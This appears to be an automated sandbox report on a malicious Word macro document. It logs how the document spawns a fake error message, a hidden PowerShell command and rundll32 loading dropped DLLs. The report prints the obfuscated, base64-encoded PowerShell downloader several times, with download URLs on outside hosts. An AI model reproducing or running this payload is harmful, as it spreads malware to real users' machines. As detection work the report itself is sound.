IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Czsbnlmzhou\heljhxhmap.nib',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tshsltpdkbydgac\umncisajimhcut.zje',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nrnhwjwgkqopncg\hahzpwlqhuedal.zvs',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wcuhm\nost.bdw',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omzikkfxzmn\texvcnoeud.iob',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Afhsry\advki.tth',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tjgkecgvqxx\dxuouhyssc.uio',Control_RunDLL
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLLJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Czsbnlmzhou\heljhxhmap.nib',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tshsltpdkbydgac\umncisajimhcut.zje',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nrnhwjwgkqopncg\hahzpwlqhuedal.zvs',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wcuhm\nost.bdw',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omzikkfxzmn\texvcnoeud.iob',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Afhsry\advki.tth',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tjgkecgvqxx\dxuouhyssc.uio',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                      Source: Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2105619748.0000000002320000.00000002.00000001.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: pack-91089 416755919.docInitial sample: OLE summary subject = Missouri success Senior Refined Cambridgeshire Refined Rubber Keyboard wireless Markets Concrete hacking

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                      Source: pack-91089 416755919.docStream path 'Macros/VBA/Owppnp8hah4xo788' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Owppnp8hah4xo788Name: Owppnp8hah4xo788
                      Obfuscated command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
                      PowerShell case anomaly foundShow sources
